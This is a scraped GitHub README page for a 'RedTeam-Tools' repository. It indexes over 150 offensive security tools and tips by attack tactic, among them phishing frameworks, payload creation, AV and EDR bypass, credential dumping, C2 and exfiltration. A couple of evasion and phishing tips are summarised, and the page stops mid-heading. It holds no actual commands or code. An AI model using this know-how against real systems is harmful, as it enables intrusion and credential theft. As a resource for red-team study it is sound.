Framework","anchor":"metasploit-framework","htmlText":"🔙Metasploit Framework"},{"level":3,"text":"🔙Pupy","anchor":"pupy","htmlText":"🔙Pupy"},{"level":3,"text":"🔙Brute Ratel","anchor":"brute-ratel","htmlText":"🔙Brute Ratel"},{"level":3,"text":"🔙NimPlant","anchor":"nimplant","htmlText":"🔙NimPlant"},{"level":3,"text":"🔙Hoaxshell","anchor":"hoaxshell","htmlText":"🔙Hoaxshell"},{"level":1,"text":"Exfiltration","anchor":"exfiltration","htmlText":"Exfiltration"},{"level":3,"text":"🔙Dnscat2","anchor":"dnscat2","htmlText":"🔙Dnscat2"},{"level":3,"text":"🔙Cloakify","anchor":"cloakify","htmlText":"🔙Cloakify"},{"level":3,"text":"🔙PyExfil","anchor":"pyexfil","htmlText":"🔙PyExfil"},{"level":4,"text":"HTTP Cookies","anchor":"http-cookies","htmlText":"HTTP Cookies"},{"level":4,"text":"ICMP Echo 8","anchor":"icmp-echo-8","htmlText":"ICMP Echo 8"},{"level":4,"text":"NTP 
Request","anchor":"ntp-request","htmlText":"NTP Request"},{"level":3,"text":"🔙Powershell RAT","anchor":"powershell-rat","htmlText":"🔙Powershell RAT"},{"level":4,"text":"Setup","anchor":"setup","htmlText":"Setup"},{"level":3,"text":"🔙GD-Thief","anchor":"gd-thief","htmlText":"🔙GD-Thief"},{"level":1,"text":"Impact","anchor":"impact","htmlText":"Impact"},{"level":3,"text":"🔙Conti Pentester Guide Leak","anchor":"conti-pentester-guide-leak","htmlText":"🔙Conti Pentester Guide Leak"},{"level":3,"text":"🔙SlowLoris","anchor":"slowloris","htmlText":"🔙SlowLoris"},{"level":3,"text":"🔙usbkill","anchor":"usbkill","htmlText":"🔙usbkill"},{"level":3,"text":"🔙Keytap","anchor":"keytap","htmlText":"🔙Keytap"}],"siteNavLoginPath":"/login?return_to=https%3A%2F%2Fgithub.com%2FA-poc%2FRedTeam-Tools"}}],"overviewFilesProcessingTime":0}},"appPayload":{"helpUrl":"https://docs.github.com","findFileWorkerPath":"/assets-cdn/worker/find-file-worker-7d7eb7c71814.js","findInFileWorkerPath":"/assets-cdn/worker/find-in-file-worker-96e76d5fdb2c.js","githubDevUrl":null,"enabled_features":{"copilot_workspace":null,"code_nav_ui_events":false,"overview_shared_code_dropdown_button":false,"react_blob_overlay":false,"accessible_code_button":true,"github_models_repo_integration":false}}}}</script> <div data-target="react-partial.reactRoot"><style data-styled="true" data-styled-version="5.3.11">.iVEunk{margin-top:16px;margin-bottom:16px;}/*!sc*/ .jzuOtQ{display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:justify;-webkit-justify-content:space-between;-ms-flex-pack:justify;justify-content:space-between;}/*!sc*/ .bGojzy{margin-bottom:0;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-flex-direction:column;-ms-flex-direction:column;flex-direction:column;row-gap:16px;}/*!sc*/ 
prc-components-UnderlineWrapper-oOh5J" aria-label="Repository files"><ul class="prc-components-UnderlineItemList-b23Hf" role="list"><li class="Box-sc-g0xbh4-0 hUCRAk"><a class="prc-components-UnderlineItem-lJsg-" href="#" aria-current="page"><span data-component="icon"><svg aria-hidden="true" focusable="false" class="octicon octicon-book" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M0 1.75A.75.75 0 0 1 .75 1h4.253c1.227 0 2.317.59 3 1.501A3.743 3.743 0 0 1 11.006 1h4.245a.75.75 0 0 1 .75.75v10.5a.75.75 0 0 1-.75.75h-4.507a2.25 2.25 0 0 0-1.591.659l-.622.621a.75.75 0 0 1-1.06 0l-.622-.621A2.25 2.25 0 0 0 5.258 13H.75a.75.75 0 0 1-.75-.75Zm7.251 10.324.004-5.073-.002-2.253A2.25 2.25 0 0 0 5.003 2.5H1.5v9h3.757a3.75 3.75 0 0 1 1.994.574ZM8.755 4.75l-.004 7.322a3.752 3.752 0 0 1 1.992-.572H14.5v-9h-3.495a2.25 2.25 0 0 0-2.25 2.25Z"></path></svg></span><span data-component="text" data-content="README">README</span></a></li></ul></nav><button style="--button-color:fg.subtle" type="button" aria-label="Outline" aria-haspopup="true" aria-expanded="false" tabindex="0" class="Box-sc-g0xbh4-0 cwoBXV prc-Button-ButtonBase-c50BI" data-loading="false" data-size="medium" data-variant="invisible" aria-describedby=":Rr9ab:-loading-announcement" id=":Rr9ab:"><svg aria-hidden="true" focusable="false" class="octicon octicon-list-unordered" viewBox="0 0 16 16" width="16" height="16" fill="currentColor" display="inline-block" overflow="visible" style="vertical-align:text-bottom"><path d="M5.75 2.5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5Zm0 5h8.5a.75.75 0 0 1 0 1.5h-8.5a.75.75 0 0 1 0-1.5ZM2 14a1 1 0 1 1 0-2 1 1 0 0 1 0 2Zm1-6a1 1 0 1 1-2 0 1 1 0 0 1 2 0ZM2 4a1 1 0 1 1 0-2 1 1 0 0 1 0 2Z"></path></svg></button></div><div class="Box-sc-g0xbh4-0 QkQOb js-snippet-clipboard-copy-unpositioned undefined" data-hpc="true"><article 
class="markdown-body entry-content container-lg" itemprop="text"><div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">RedTeam-Tools</h1><a id="user-content-redteam-tools" class="anchor" aria-label="Permalink: RedTeam-Tools" href="#redteam-tools"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p align="center" dir="auto"> <a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png"><img src="https://user-images.githubusercontent.com/100603074/210680426-20a92131-56f9-43ad-be82-f449e3215dda.png" height="300" style="max-width: 100%;"></a> </p> <p dir="auto">This github repository contains a collection of <strong>150+</strong> <strong>tools</strong> and <strong>resources</strong> that can be useful for <strong>red teaming activities</strong>.</p> <p dir="auto">Some of the tools may be specifically designed for red teaming, while others are more general-purpose and can be adapted for use in a red teaming context.</p> <blockquote> <p dir="auto">🔗 If you are a Blue Teamer, check out <a href="https://github.com/A-poc/BlueTeam-Tools">BlueTeam-Tools</a></p> </blockquote> <blockquote> <p dir="auto"><strong>Warning</strong></p> <p dir="auto"><em>The materials in this repository are for informational and educational purposes only. 
They are not intended for use in any illegal activities.</em></p> </blockquote> <blockquote> <p dir="auto"><strong>Note</strong></p> <p dir="auto"><em>Hide Tool List headings with the arrow.</em></p> <p dir="auto"><em>Click 🔙 to get back to the list.</em></p> </blockquote> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Tool List</h1><a id="user-content-tool-list" class="anchor" aria-label="Permalink: Tool List" href="#tool-list"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <details open=""> <summary><b>Red Team Tips</b> 19 tips</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#improved-html-smuggling-with-mouse-move-eventlistener">Improved HTML smuggling with mouse move eventlistener</a></b><i> @pr0xylife</i></li> <li><b><a href="#google-translate-for-phishing">Google translate for phishing</a></b><i> @malmoeb</i></li> <li><b><a href="#hiding-the-local-admin-account">Hiding the local admin account</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cripple-windows-defender-by-deleting-signatures">Cripple windows defender by deleting signatures</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#enable-multiple-rdp-sessions-per-user">Enable multiple RDP sessions per user</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#sysinternals-psexecexe-local-alternative">Sysinternals PsExec.exe local alternative</a></b><i> 
@GuhnooPlusLinux</i></li> <li><b><a href="#live-off-the-land-port-scanner">Live off the land port scanner</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#proxy-aware-powershell-downloadstring">Proxy aware PowerShell DownloadString</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#looking-for-internal-endpoints-in-browser-bookmarks">Looking for internal endpoints in browser bookmarks</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#query-dns-records-for-enumeration">Query DNS records for enumeration</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#unquoted-service-paths-without-powerup">Unquoted service paths without PowerUp</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#bypass-a-disabled-command-prompt-with-k">Bypass a disabled command prompt with /k</a></b><i> Martin Sohn Christensen</i></li> <li><b><a href="#stop-windows-defender-deleting-mimikatzexe">Stop windows defender deleting mimikatz.exe</a></b><i> @GuhnooPlusLinux</i></li> <li><b><a href="#check-if-you-are-in-a-virtual-machine">Check if you are in a virtual machine</a></b><i> @dmcxblue</i></li> <li><b><a href="#enumerate-applocker-rules">Enumerate AppLocker rules</a></b><i> @Alh4zr3d</i></li> <li><b><a href="#cmd-shortcut-with-6-pixels-via-mspaint">CMD shortcut with 6 pixels via mspaint</a></b><i> PenTestPartners</i></li> <li><b><a href="#link-spoofing-with-preventdefault-javascript-method">Link spoofing with PreventDefault JavaScript method</a></b><i> </i></li> <li><b><a href="#check-smb-firewall-rules-with-responder">Check SMB firewall rules with Responder</a></b><i> @malmoeb</i></li> <li><b><a href="#disable-av-with-sysinternals-pssuspend">Disable AV with SysInternals PsSuspend</a></b><i> @0gtweet</i></li> </ul> </ul> </details> <details open=""> <summary><b>Reconnaissance</b> 24 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#spiderfoot">spiderfoot</a></b><i> Automated OSINT and attack surface mapping</i></li> <li><b><a href="#reconftw">reconftw</a></b><i> Automated subdomain and 
vulnerability recon tool</i></li> <li><b><a href="#subzy">subzy</a></b><i> Subdomain takeover vulnerability checker</i></li> <li><b><a href="#smtp-user-enum">smtp-user-enum</a></b><i> SMTP user enumeration</i></li> <li><b><a href="#crtsh---httprobe---eyewitness">crt.sh -> httprobe -> EyeWitness</a></b><i> Automated domain screenshotting</i></li> <li><b><a href="#jsendpoints">jsendpoints</a></b><i> Extract page DOM links</i></li> <li><b><a href="#nuclei">nuclei</a></b><i> Vulnerability scanner</i></li> <li><b><a href="#certsniff">certSniff</a></b><i> Certificate transparency log keyword sniffer</i></li> <li><b><a href="#gobuster">gobuster</a></b><i> Website path brute force</i></li> <li><b><a href="#feroxbuster">feroxbuster</a></b><i> Fast content discovery tool written in Rust</i></li> <li><b><a href="#cloudbrute">CloudBrute</a></b><i> Cloud infrastructure brute force</i></li> <li><b><a href="#dnsrecon">dnsrecon</a></b><i> Enumerate DNS records</i></li> <li><b><a href="#shodanio">Shodan.io</a></b><i> Public facing system knowledge base</i></li> <li><b><a href="#aort">AORT (All in One Recon Tool)</a></b><i> Subdomain enumeration</i></li> <li><b><a href="#spoofcheck">spoofcheck</a></b><i> SPF/DMARC record checker</i></li> <li><b><a href="#awsbucketdump">AWSBucketDump</a></b><i> S3 bucket enumeration</i></li> <li><b><a href="#githarvester">GitHarvester</a></b><i> GitHub credential searcher</i></li> <li><b><a href="#trufflehog">truffleHog</a></b><i> GitHub credential scanner</i></li> <li><b><a href="#dismap">Dismap</a></b><i> Asset discovery/identification</i></li> <li><b><a href="#enum4linux">enum4linux</a></b><i> Windows/samba enumeration</i></li> <li><b><a href="#skanuvaty">skanuvaty</a></b><i> Dangerously fast dns/network/port scanner</i></li> <li><b><a href="#metabigor">Metabigor</a></b><i> OSINT tool without API</i></li> <li><b><a href="#gitrob">Gitrob</a></b><i> GitHub sensitive information scanner</i></li> <li><b><a href="#gowitness">gowitness</a></b><i> Web 
screenshot utility using Chrome Headless</i></li> </ul> </ul> </details> <details open=""> <summary><b>Resource Development</b> 12 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#remoteinjector">remoteinjector</a></b><i> Inject remote template link into a Word document</i></li> <li><b><a href="#chimera">Chimera</a></b><i> PowerShell obfuscation</i></li> <li><b><a href="#msfvenom">msfvenom</a></b><i> Payload creation</i></li> <li><b><a href="#shellter">Shellter</a></b><i> Dynamic shellcode injection tool</i></li> <li><b><a href="#freeze">Freeze</a></b><i> Payload creation (circumventing EDR)</i></li> <li><b><a href="#wordsteal">WordSteal</a></b><i> Steal NTLM hashes with Microsoft Word</i></li> <li><b><a href="#ntapi-undocumented-functions">NTAPI Undocumented Functions</a></b><i> Windows NT Kernel, Native API and drivers</i></li> <li><b><a href="#kernel-callback-functions">Kernel Callback Functions</a></b><i> Undocumented Windows APIs</i></li> <li><b><a href="#offensivevba">OffensiveVBA</a></b><i> Office macro code execution and evasion techniques</i></li> <li><b><a href="#wsh">WSH</a></b><i> WSH payload</i></li> <li><b><a href="#hta">HTA</a></b><i> HTA payload</i></li> <li><b><a href="#vba">VBA</a></b><i> VBA payload</i></li> </ul> </ul> </details> <details open=""> <summary><b>Initial Access</b> 10 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#credmaster">CredMaster</a></b><i> CredKing password spraying tool</i></li> <li><b><a href="#trevorspray">TREVORspray</a></b><i> Password sprayer with threading</i></li> <li><b><a href="#evilqr">evilqr</a></b><i> QRLJacking phishing PoC</i></li> <li><b><a href="#cupp">CUPP</a></b><i> Common User Passwords Profiler (CUPP)</i></li> <li><b><a href="#bash-bunny">Bash Bunny</a></b><i> USB attack tool</i></li> <li><b><a href="#evilgophish">EvilGoPhish</a></b><i> Phishing campaign framework</i></li> <li><b><a href="#social-engineer-toolkit-set">The Social-Engineer Toolkit</a></b><i> Phishing 
campaign framework</i></li> <li><b><a href="#hydra">Hydra</a></b><i> Brute force tool</i></li> <li><b><a href="#squarephish">SquarePhish</a></b><i> OAuth/QR code phishing framework</i></li> <li><b><a href="#king-phisher">King Phisher</a></b><i> Phishing campaign framework</i></li> </ul> </ul> </details> <details open=""> <summary><b>Execution</b> 13 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#responder">Responder</a></b><i> LLMNR, NBT-NS and MDNS poisoner</i></li> <li><b><a href="#secretsdump">secretsdump</a></b><i> Remote hash dumper</i></li> <li><b><a href="#evil-winrm">evil-winrm</a></b><i> WinRM shell</i></li> <li><b><a href="#donut">Donut</a></b><i> In-memory .NET execution</i></li> <li><b><a href="#macro_pack">Macro_pack</a></b><i> Macro obfuscation</i></li> <li><b><a href="#powersploit">PowerSploit</a></b><i> PowerShell script suite</i></li> <li><b><a href="#rubeus">Rubeus</a></b><i> Active directory hack tool</i></li> <li><b><a href="#sharpup">SharpUp</a></b><i> Windows vulnerability identifier</i></li> <li><b><a href="#sqlrecon">SQLRecon</a></b><i> Offensive MS-SQL toolkit</i></li> <li><b><a href="#ultimateapplockerbypasslist">UltimateAppLockerByPassList</a></b><i> Common AppLocker Bypass Techniques</i></li> <li><b><a href="#starfighters">StarFighters</a></b><i> JavaScript and VBScript Based Empire Launcher</i></li> <li><b><a href="#demiguise">demiguise</a></b><i> HTA encryption tool</i></li> <li><b><a href="#powerzure">PowerZure</a></b><i> PowerShell framework to assess Azure security</i></li> </ul> </ul> </details> <details open=""> <summary><b>Persistence</b> 4 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#impacket">Impacket</a></b><i> Python script suite</i></li> <li><b><a href="#empire">Empire</a></b><i> Post-exploitation framework</i></li> <li><b><a href="#sharpersist">SharPersist</a></b><i> Windows persistence toolkit</i></li> <li><b><a href="#ligolo-ng">ligolo-ng</a></b><i> Tunneling tool that uses a TUN 
interface</i></li> </ul> </ul> </details> <details open=""> <summary><b>Privilege Escalation</b> 11 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#crassus">Crassus</a></b><i> Windows privilege escalation discovery tool</i></li> <li><b><a href="#linpeas">LinPEAS</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#winpeas">WinPEAS</a></b><i> Windows privilege escalation</i></li> <li><b><a href="#linux-smart-enumeration">linux-smart-enumeration</a></b><i> Linux privilege escalation</i></li> <li><b><a href="#certify">Certify</a></b><i> Active directory privilege escalation</i></li> <li><b><a href="#get-gpppassword">Get-GPPPassword</a></b><i> Windows password extraction</i></li> <li><b><a href="#sherlock">Sherlock</a></b><i> PowerShell privilege escalation tool</i></li> <li><b><a href="#watson">Watson</a></b><i> Windows privilege escalation tool</i></li> <li><b><a href="#impulsivedllhijack">ImpulsiveDLLHijack</a></b><i> DLL Hijack tool</i></li> <li><b><a href="#adfsdump">ADFSDump</a></b><i> AD FS dump tool</i></li> <li><b><a href="#beroot">BeRoot</a></b><i> Multi OS Privilege Escalation Project</i></li> </ul> </ul> </details> <details open=""> <summary><b>Defense Evasion</b> 8 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#invoke-obfuscation">Invoke-Obfuscation</a></b><i> Script obfuscator</i></li> <li><b><a href="#veil">Veil</a></b><i> Metasploit payload obfuscator</i></li> <li><b><a href="#sharpblock">SharpBlock</a></b><i> EDR bypass via entry point execution prevention</i></li> <li><b><a href="#alcatraz">Alcatraz</a></b><i> GUI x64 binary obfuscator</i></li> <li><b><a href="#mangle">Mangle</a></b><i> Compiled executable manipulation</i></li> <li><b><a href="#amsi-fail">AMSI Fail</a></b><i> PowerShell snippets that break or disable AMSI</i></li> <li><b><a href="#scarecrow">ScareCrow</a></b><i> Payload creation framework designed around EDR bypass</i></li> <li><b><a href="#moonwalk">moonwalk</a></b><i> Linux system log 
and filesystem timestamp remover</i></li> </ul> </ul> </details> <details open=""> <summary><b>Credential Access</b> 11 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#mimikatz">Mimikatz</a></b><i> Windows credential extractor</i></li> <li><b><a href="#lazagne">LaZagne</a></b><i> Local password extractor</i></li> <li><b><a href="#hashcat">hashcat</a></b><i> Password hash cracking</i></li> <li><b><a href="#john-the-ripper">John the Ripper</a></b><i> Password hash cracking</i></li> <li><b><a href="#scomdecrypt">SCOMDecrypt</a></b><i> SCOM Credential Decryption Tool</i></li> <li><b><a href="#nanodump">nanodump</a></b><i> LSASS process minidump creation</i></li> <li><b><a href="#eviltree">eviltree</a></b><i> Tree remake for credential discovery</i></li> <li><b><a href="#seeyoucm-thief">SeeYouCM-Thief</a></b><i> Cisco phone systems configuration file parsing</i></li> <li><b><a href="#mailsniper">MailSniper</a></b><i> Microsoft Exchange Mail Searcher</i></li> <li><b><a href="#sharpchromium">SharpChromium</a></b><i> Cookie, history and saved login chromium extractor</i></li> <li><b><a href="#dploot">dploot</a></b><i> DPAPI looting remotely in Python</i></li> </ul> </ul> </details> <details open=""> <summary><b>Discovery</b> 6 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#pcredz">PCredz</a></b><i> Credential discovery PCAP/live interface</i></li> <li><b><a href="#pingcastle">PingCastle</a></b><i> Active directory assessor</i></li> <li><b><a href="#seatbelt">Seatbelt</a></b><i> Local vulnerability scanner</i></li> <li><b><a href="#adrecon">ADRecon</a></b><i> Active directory recon</i></li> <li><b><a href="#adidnsdump">adidnsdump</a></b><i> Active Directory Integrated DNS dumping</i></li> <li><b><a href="#scavenger">scavenger</a></b><i> Scanning tool for scavenging systems</i></li> </ul> </ul> </details> <details open=""> <summary><b>Lateral Movement</b> 12 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a 
href="#crackmapexec">crackmapexec</a></b><i> Windows/Active directory lateral movement toolkit</i></li> <li><b><a href="#wmiops">WMIOps</a></b><i> WMI remote commands</i></li> <li><b><a href="#powerlessshell">PowerLessShell</a></b><i> Remote PowerShell without PowerShell</i></li> <li><b><a href="#psexec">PsExec</a></b><i> Light-weight telnet replacement</i></li> <li><b><a href="#liquidsnake">LiquidSnake</a></b><i> Fileless lateral movement</i></li> <li><b><a href="#enabling-rdp">Enabling RDP</a></b><i> Windows RDP enable command</i></li> <li><b><a href="#upgrading-shell-to-meterpreter">Upgrading shell to meterpreter</a></b><i> Reverse shell improvement</i></li> <li><b><a href="#forwarding-ports">Forwarding Ports</a></b><i> Local port forward command</i></li> <li><b><a href="#jenkins-reverse-shell">Jenkins reverse shell</a></b><i> Jenkins shell command</i></li> <li><b><a href="#adfspoof">ADFSpoof</a></b><i> Forge AD FS security tokens</i></li> <li><b><a href="#kerbrute">kerbrute</a></b><i> A tool to perform Kerberos pre-auth bruteforcing</i></li> <li><b><a href="#coercer">Coercer</a></b><i> Coerce a Windows server to authenticate</i></li> </ul> </ul> </details> <details open=""> <summary><b>Collection</b> 3 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#bloodhound">BloodHound</a></b><i> Active directory visualisation</i></li> <li><b><a href="#snaffler">Snaffler</a></b><i> Active directory credential collector</i></li> <li><b><a href="#linwinpwn">linWinPwn</a></b><i> Active Directory Enumeration and Vulnerability checks</i></li> </ul> </ul> </details> <details open=""> <summary><b>Command and Control</b> 9 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#living-off-trusted-sites-project">Living Off Trusted Sites Project</a></b><i> Leverage legitimate domains for your C2</i></li> <li><b><a href="#havoc">Havoc</a></b><i> Command and control framework</i></li> 
<li><b><a href="#covenant">Covenant</a></b><i> Command and control framework (.NET)</i></li> <li><b><a href="#merlin">Merlin</a></b><i> Command and control framework (Golang)</i></li> <li><b><a href="#metasploit-framework">Metasploit Framework</a></b><i> Command and control framework (Ruby)</i></li> <li><b><a href="#pupy">Pupy</a></b><i> Command and control framework (Python)</i></li> <li><b><a href="#brute-ratel">Brute Ratel</a></b><i> Command and control framework ($$$)</i></li> <li><b><a href="#nimplant">NimPlant</a></b><i> C2 implant written in Nim</i></li> <li><b><a href="#hoaxshell">Hoaxshell</a></b><i> PowerShell reverse shell</i></li> </ul> </ul> </details> <details open=""> <summary><b>Exfiltration</b> 5 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#dnscat2">Dnscat2</a></b><i> C2 via DNS tunneling</i></li> <li><b><a href="#cloakify">Cloakify</a></b><i> Data transformation for exfiltration</i></li> <li><b><a href="#pyexfil">PyExfil</a></b><i> Data exfiltration PoC</i></li> <li><b><a href="#powershell-rat">Powershell RAT</a></b><i> Python-based backdoor</i></li> <li><b><a href="#gd-thief">GD-Thief</a></b><i> Google Drive exfiltration</i></li> </ul> </ul> </details> <details open=""> <summary><b>Impact</b> 4 tools</summary> <ul dir="auto"> <ul dir="auto"> <li><b><a href="#conti-pentester-guide-leak">Conti Pentester Guide Leak</a></b><i> Conti ransomware group affiliate toolkit</i></li> <li><b><a href="#slowloris">SlowLoris</a></b><i> Simple denial of service</i></li> <li><b><a href="#usbkill">usbkill</a></b><i> Anti-forensic kill-switch</i></li> <li><b><a href="#keytap">Keytap</a></b><i> Get pressed keyboard keys from typing audio</i></li> </ul> </ul> </details> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Red Team Tips</h1><a id="user-content-red-team-tips" class="anchor" aria-label="Permalink: Red Team Tips" href="#red-team-tips"><svg class="octicon octicon-link" viewBox="0 0 16 16" 
version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><em>Learn from Red Teamers with a collection of Red Teaming Tips. These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.</em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Improved HTML smuggling with mouse move eventlistener</h3><a id="user-content-improved-html-smuggling-with-mouse-move-eventlistener" class="anchor" aria-label="Permalink: 🔙Improved HTML smuggling with mouse move eventlistener" href="#improved-html-smuggling-with-mouse-move-eventlistener"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Description:</strong> <em>'Qakbot added an EventListener for mouse movement to the HTML smuggling 
attachment for anti-evasion; in sandboxes the zip won't drop.'</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://x.com/pr0xylife" rel="nofollow">@pr0xylife</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://x.com/pr0xylife/status/1598410732516802563" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Google translate for phishing</h3><a id="user-content-google-translate-for-phishing" class="anchor" aria-label="Permalink: 🔙Google translate for phishing" href="#google-translate-for-phishing"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto"><strong>Description:</strong> <em>A successful credential-stealing phishing page being proxied via the Google Translate page-view functionality.</em></p> <p dir="auto"><strong>Credit:</strong> <a href="https://x.com/malmoeb" rel="nofollow">@malmoeb</a></p> <p dir="auto"><strong>Link:</strong> <a href="https://x.com/malmoeb/status/1671106885590630400" rel="nofollow">Twitter</a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a>Hiding the local admin account</h3><a id="user-content-hiding-the-local-admin-account" class="anchor" aria-label="Permalink: 🔙Hiding the local admin account" 
